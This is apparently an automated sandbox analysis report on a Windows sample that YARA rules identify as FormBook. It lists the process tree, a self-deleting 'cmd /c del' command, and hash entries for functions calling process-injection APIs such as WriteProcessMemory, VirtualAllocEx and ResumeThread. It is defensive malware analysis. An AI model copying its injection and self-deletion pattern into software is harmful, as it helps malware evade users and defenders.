Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: ox87DNNM8d.exe PID: 5656 Parent PID: 4368

General

Start time:	06:28:49
Start date:	12/05/2021
Path:	C:\Users\user\Desktop\ox87DNNM8d.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\ox87DNNM8d.exe
Imagebase:	0xfb0000
File size:	840704 bytes
MD5 hash:	41E38BCD6F5F3001C2E4F08EBCD2396C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3472 Parent PID: 5656

General

Start time:	06:28:52
Start date:	12/05/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff693d90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: systray.exe PID: 6544 Parent PID: 3472

General

Start time:	06:29:10
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\systray.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\systray.exe
Imagebase:	0x7ff797770000
File size:	9728 bytes
MD5 hash:	1373D481BE4C8A6E5F5030D2FB0A0C68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 6824 Parent PID: 6544

General

Start time:	06:29:15
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\ox87DNNM8d.exe'
Imagebase:	0xf60000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6876 Parent PID: 6824

General

Start time:	06:29:15
Start date:	12/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: ox87DNNM8d.exe PID: 4368 Parent PID: 5700 ox87DNNM8d.exeCOMMON

Execution Graph

Execution Coverage:	10.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.8%
Total number of Nodes:	106
Total number of Limit Nodes:	7

Executed Functions

Function 064280F8, Relevance: 2.7, Strings: 2, Instructions: 174
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

X) X, xrefs: 064281FE
X) X, xrefs: 064281F7

Memory Dump Source

Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd

Similarity

API ID:
String ID: X) X$X) X
API String ID: 0-462033721
Opcode ID: f9a393cda20f8eec8e0cc08dbbd58076bb0e722d36ab27e575613ee0305ca19c
Instruction ID: 47c0aab7782d02018097d5e57db074d7d98e1174768f468ae9760e685a85d095
Opcode Fuzzy Hash: f9a393cda20f8eec8e0cc08dbbd58076bb0e722d36ab27e575613ee0305ca19c
Instruction Fuzzy Hash: 75617A70E0421A8FDB44CFEAC5416EEFBF2BF89310F60D42AD524A7254D73499868FA0

Uniqueness

Uniqueness Score: -1.00%

Function 06420E38, Relevance: .4, Instructions: 414COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7177dc3c4cf06bf7428b189d8bb1bfa1c6eda712ab739f6482f93b5ced30212
Instruction ID: 3766400bc025d3919593c134249208429b38efc64c7f9e2686fceeb75e511ccd
Opcode Fuzzy Hash: a7177dc3c4cf06bf7428b189d8bb1bfa1c6eda712ab739f6482f93b5ced30212
Instruction Fuzzy Hash: E8F1D07090425ADFDB44CFA5C8858AFFBB2FF89301B64D156E546EB201D730A982CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 06420F30, Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a284269bab6ae2a633dc130336e5246dcb94b60c9cef5141934eae6cf8e25e9
Instruction ID: 0eb313671349921c8c89809ee496387a23f1c767dfe88b2cffa4b4c96e436822
Opcode Fuzzy Hash: 7a284269bab6ae2a633dc130336e5246dcb94b60c9cef5141934eae6cf8e25e9
Instruction Fuzzy Hash: DEC17974D0421ADFCB48CF95C9848AEFBB2FF89301B61D15AD516AB214D734AA82CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0642E228, Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d848789a755240c0fe35460e21b537578c6f75e35ebe72e9a087d92ad732bbd
Instruction ID: fe1c85b1dc0adbf08e4042de983d8ab6a242ada46ff69694152126868c8e7da3
Opcode Fuzzy Hash: 0d848789a755240c0fe35460e21b537578c6f75e35ebe72e9a087d92ad732bbd
Instruction Fuzzy Hash: 00B17371E00226CFCB55CFA9C994A9EB7B1FF44311FA6805AE915AB3A1D730ED41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 06427C80, Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ee66f48eaa86a69c9351b87d0ed87a2fdff3389482d72cb418231c6f89e19bd
Instruction ID: 77b37a43b5248b488a1f1c9a5dff823f1c9813a49d1267dc9be55714a544588e
Opcode Fuzzy Hash: 8ee66f48eaa86a69c9351b87d0ed87a2fdff3389482d72cb418231c6f89e19bd
Instruction Fuzzy Hash: 5CA11774E0422A8FDB44DFAAC58159EFBF2BF89310F64D12AD408E7315DB349942CB65

Uniqueness

Uniqueness Score: -1.00%

Function 06427C72, Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 360e0ce0a3f9086ee609e9284ffb4322f753bc47856ff22294575b7daa2eeb86
Instruction ID: d4c26253d0d92a28279a4322beed5cf457a77608cacc8ac6abd89ebdbd881067
Opcode Fuzzy Hash: 360e0ce0a3f9086ee609e9284ffb4322f753bc47856ff22294575b7daa2eeb86
Instruction Fuzzy Hash: 08A12774E0422A8FDB44CFAAC58159EFBF2BF89310F64D12AD408EB355DB309942CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0642C1D8, Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1244834abaf509cfd3ade6bcc4a70703197145c8aa24d1da8fa0490f97bf0716
Instruction ID: f39e6b0ef835ae89e2353930ceff80a4f08597216a2ceac352851de332632f0e
Opcode Fuzzy Hash: 1244834abaf509cfd3ade6bcc4a70703197145c8aa24d1da8fa0490f97bf0716
Instruction Fuzzy Hash: A691E8B4E0521ACFDB84CFE5D5815EEBBF2EB89340F60902AD415BB354DB3099428F94

Uniqueness

Uniqueness Score: -1.00%

Function 06420040, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b850a7c418c8132ba6ac12dea5d26efd61d7d21b531b9015eba6cf8b06631dae
Instruction ID: 495725263eb427e4507d29f8a54c5e891ca776993de525f18ac506428137b422
Opcode Fuzzy Hash: b850a7c418c8132ba6ac12dea5d26efd61d7d21b531b9015eba6cf8b06631dae
Instruction Fuzzy Hash: 9C21F771E006188BDB58CFAAD8446DEFBF7AFC9311F24C16AD809A7254DB341A46CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01606AA1, Relevance: 6.1, APIs: 4, Instructions: 124
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 01606B10
GetCurrentThread.KERNEL32 ref: 01606B4D
GetCurrentProcess.KERNEL32 ref: 01606B8A
GetCurrentThreadId.KERNEL32 ref: 01606BE3

Memory Dump Source

Source File: 00000001.00000002.233979966.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1600000_ox87DNNM8d.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: e40aca58c22c667757819a8ea8ac4e4a803f65dc2e3b87fc8fc37c1c0f2635ad
Instruction ID: f4697bcfc6d18ba649d2f2ad4be07916775c016e26275e934684d8f00f8b70c9
Opcode Fuzzy Hash: e40aca58c22c667757819a8ea8ac4e4a803f65dc2e3b87fc8fc37c1c0f2635ad
Instruction Fuzzy Hash: EC5156B49007898FDB19CFA9D948BEEBBF0FF48318F14805AE019A7394DB745844CB65

Uniqueness

Uniqueness Score: -1.00%

Function 01606AB0, Relevance: 6.1, APIs: 4, Instructions: 120
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 01606B10
GetCurrentThread.KERNEL32 ref: 01606B4D
GetCurrentProcess.KERNEL32 ref: 01606B8A
GetCurrentThreadId.KERNEL32 ref: 01606BE3

Memory Dump Source

Source File: 00000001.00000002.233979966.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1600000_ox87DNNM8d.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: f91fd100d46866e90ea6de16468e58c34cd239e912805edca50dfafca41023f8
Instruction ID: 2c1db9127b3775b69a81386cad2d5254994cc981bb8d14a3f82d73796b296265
Opcode Fuzzy Hash: f91fd100d46866e90ea6de16468e58c34cd239e912805edca50dfafca41023f8
Instruction Fuzzy Hash: C85144B49006898FDB18CFA9D948B9EBBF4FF48318F248459E419B7394DB34A844CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0642AFC0, Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0642B1F6

Memory Dump Source

Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 19a4128074cd66b7e1051dff1c6820a346736feeb860c4c7493a49d1d3903306
Instruction ID: 0825c999c9db03e4d5f6df56f9336295a637847ecffeed1ee0a8fc0d8b325c85
Opcode Fuzzy Hash: 19a4128074cd66b7e1051dff1c6820a346736feeb860c4c7493a49d1d3903306
Instruction Fuzzy Hash: 62918C71D0022A8FDB51CF64C9817EEBBB2FF44318F54856AE818A7380DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0160BAD8, Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0160BD2E

Memory Dump Source

Source File: 00000001.00000002.233979966.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1600000_ox87DNNM8d.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 5e0460eb46779e5cf4c0ed44cb90a214f9ae5815767bb21f345169d493fcfb96
Instruction ID: d8031d7d9fd936177916abbde2ed5581809ed74aa32b141938ee38e3a3c6ba73
Opcode Fuzzy Hash: 5e0460eb46779e5cf4c0ed44cb90a214f9ae5815767bb21f345169d493fcfb96
Instruction Fuzzy Hash: FF713370A00B058FD729DF69D85075BBBF1BF88204F00892ED546D7B94DB74E8458F91

Uniqueness

Uniqueness Score: -1.00%

Function 0160DB8D, Relevance: 1.6, APIs: 1, Instructions: 115
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0160DCAA

Memory Dump Source

Source File: 00000001.00000002.233979966.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1600000_ox87DNNM8d.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 69659a65db828e2febacdfa1b45185b25edb6b07bb07fb6e14c144f216078ef9
Instruction ID: cc6ebc9272f88c0d487b3fab803d14b97bcfa625af70fec6ad7b1d9c8d5b2116
Opcode Fuzzy Hash: 69659a65db828e2febacdfa1b45185b25edb6b07bb07fb6e14c144f216078ef9
Instruction Fuzzy Hash: 3851DFB1D003489FDB15CFD9D884ADEBBB5BF88314F24822AE819AB250D7709885CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0160DB98, Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0160DCAA

Memory Dump Source

Source File: 00000001.00000002.233979966.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1600000_ox87DNNM8d.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: fa0df80a86349e8aebf4c407888c07fd645ec62635bcbfcb8ba1dec627ae22ad
Instruction ID: fc7718fa8c41a4a5e3d4936b3f27780c59009973db57c6f99c1a1c461d12f803
Opcode Fuzzy Hash: fa0df80a86349e8aebf4c407888c07fd645ec62635bcbfcb8ba1dec627ae22ad
Instruction Fuzzy Hash: 9441CFB1D003489FDB15CFD9D984ADEBBB5BF88314F24822AE819AB250D7749885CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0642A938, Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0642A9C8

Memory Dump Source

Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 0f9893c52533c89deb4360d1348e87160cfa95080d6b8236c5b7e0e38b2cff4c
Instruction ID: 148c71f385a1cc2bb68a00938fe1904521e8f3685f5822fb51c2df9c3d7173bf
Opcode Fuzzy Hash: 0f9893c52533c89deb4360d1348e87160cfa95080d6b8236c5b7e0e38b2cff4c
Instruction Fuzzy Hash: AF214671900359DFCB00CFAAC880BEEBBF5FF48314F51882AE958A7240D7789954DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0642AE28, Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0642AEA8

Memory Dump Source

Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 3d4b7b50eea70d657a041111ad7edefc15110fc517d52f1e51dc0cdd9e97486c
Instruction ID: 74fa00dd2d2c508afcdeabaafad089bde50ba05c5dfdb90c8a564e6e538c1e6d
Opcode Fuzzy Hash: 3d4b7b50eea70d657a041111ad7edefc15110fc517d52f1e51dc0cdd9e97486c
Instruction Fuzzy Hash: 4C212571D003599FCB10CFAAC884AEEFBF5FF48314F51842AE918A7250D7389945DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0642A7A0, Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetThreadContext.KERNELBASE(?,00000000), ref: 0642A81E

Memory Dump Source

Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: cb5cd3861a87cf54b99c574a8f234059b0109a3278b5184d3a338699029f12bc
Instruction ID: c5f2706027be564e5bee02a4ccbbc093068778e03cffa4ede03412158817555e
Opcode Fuzzy Hash: cb5cd3861a87cf54b99c574a8f234059b0109a3278b5184d3a338699029f12bc
Instruction Fuzzy Hash: 51213771D003598FCB10CFAAC4847EEBBF4AF88314F54842AD959A7240DB78A985CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01606CD1, Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01606D5F

Memory Dump Source

Source File: 00000001.00000002.233979966.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1600000_ox87DNNM8d.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 23f63d47899e2ba754f7a4899efc6670957db39496f4baf2f10098ae76b516b4
Instruction ID: 61bfbb4365ee89081027362d810dfcff2fb1d6a0ef3bf6d11a3501f1b7b64fa4
Opcode Fuzzy Hash: 23f63d47899e2ba754f7a4899efc6670957db39496f4baf2f10098ae76b516b4
Instruction Fuzzy Hash: 0A21E0B59002489FDB10CFA9D984ADEBBF4FF48324F14841AE954B7350D374A954DF61

Uniqueness

Uniqueness Score: -1.00%

Function 01606CD8, Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01606D5F

Memory Dump Source

Source File: 00000001.00000002.233979966.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1600000_ox87DNNM8d.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 49785aa3cdca9e2b8cc61716572efa85b69848ea3fb44b860b49b66f79b2da2a
Instruction ID: c0a4e8c338c298b4a4093fdf4c38f6581b6d28cf6741f8707ad0f986b11e5119
Opcode Fuzzy Hash: 49785aa3cdca9e2b8cc61716572efa85b69848ea3fb44b860b49b66f79b2da2a
Instruction Fuzzy Hash: 2221C2B5900248AFDB10CFA9D984ADEBBF8FB48324F14841AE954A3350D774A954DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06426A00, Relevance: 1.6, APIs: 1, Instructions: 55
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 06426A73

Memory Dump Source

Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 109de91656269b50aba8831a2c560e9978d6abe752d1f8898b8965ccf9fcc5e2
Instruction ID: 7feee91176e8addf2c63bd9bf09e71eef3c9690adea20658ebd496c6353fb1e6
Opcode Fuzzy Hash: 109de91656269b50aba8831a2c560e9978d6abe752d1f8898b8965ccf9fcc5e2
Instruction Fuzzy Hash: FC2114B1D002599FCB10CF9AC884BDEFBF4FB48320F11802AE458A7250D778A544DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0160AFD0, Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0160BDA9,00000800,00000000,00000000), ref: 0160BFBA

Memory Dump Source

Source File: 00000001.00000002.233979966.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1600000_ox87DNNM8d.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 73b54ff53b16e69314e76cd3b0fce784c908215b0d8ce47f78d628e7565636c0
Instruction ID: df7eb38f853d74916342271145d860e086b091bf031d610422ab5e0e41db777a
Opcode Fuzzy Hash: 73b54ff53b16e69314e76cd3b0fce784c908215b0d8ce47f78d628e7565636c0
Instruction Fuzzy Hash: A211FFB69042488FDB14CFAAD844A9FFBF4EB88320F04842EE519A7240C775A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0642A878, Relevance: 1.6, APIs: 1, Instructions: 53
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0642A8E6

Memory Dump Source

Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b6803457b14f3c68259c9decadc288ab030d0467f9981959f519dc4165d864c2
Instruction ID: f90efb8bc194fec9362f3b49ff04224a7077bd5d468dd3284d2ee5bc4c82905c
Opcode Fuzzy Hash: b6803457b14f3c68259c9decadc288ab030d0467f9981959f519dc4165d864c2
Instruction Fuzzy Hash: 661126719002899BCB10DFA9D844ADFBBF5EF48324F14841AE519A7250C775A944DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0160BF49, Relevance: 1.6, APIs: 1, Instructions: 51libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0160BDA9,00000800,00000000,00000000), ref: 0160BFBA

Memory Dump Source

Source File: 00000001.00000002.233979966.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1600000_ox87DNNM8d.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4a7ab86d598a37cf4f0fee67ab7815296d7da800610528003ccde7d998b4d084
Instruction ID: f031bcc4a3e9400b658c7130a8ddd825de11fd30a2e4ae83bab1b28543649f89
Opcode Fuzzy Hash: 4a7ab86d598a37cf4f0fee67ab7815296d7da800610528003ccde7d998b4d084
Instruction Fuzzy Hash: 3A1100B69002498FDB15CFAAD944B9EFBF4EB48314F14841EE519B7250C379A545CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0642A058, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0642A0BA

Memory Dump Source

Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 13b6684b232471d7c54723f367f929ddaa7f5289fcee86a07634176dfef61cbc
Instruction ID: d0c316a99e3297e762711da4a3fc9ded8e21b23ebfe7a5204c7e4e53ee5513ce
Opcode Fuzzy Hash: 13b6684b232471d7c54723f367f929ddaa7f5289fcee86a07634176dfef61cbc
Instruction Fuzzy Hash: DD112571D003598BCB10DFAAC4447EEFBF4AB88324F25841AD519A7340DB74A944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0160DDD8, Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 0160DE3D

Memory Dump Source

Source File: 00000001.00000002.233979966.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1600000_ox87DNNM8d.jbxd

Similarity

API ID: LongWindow
String ID:
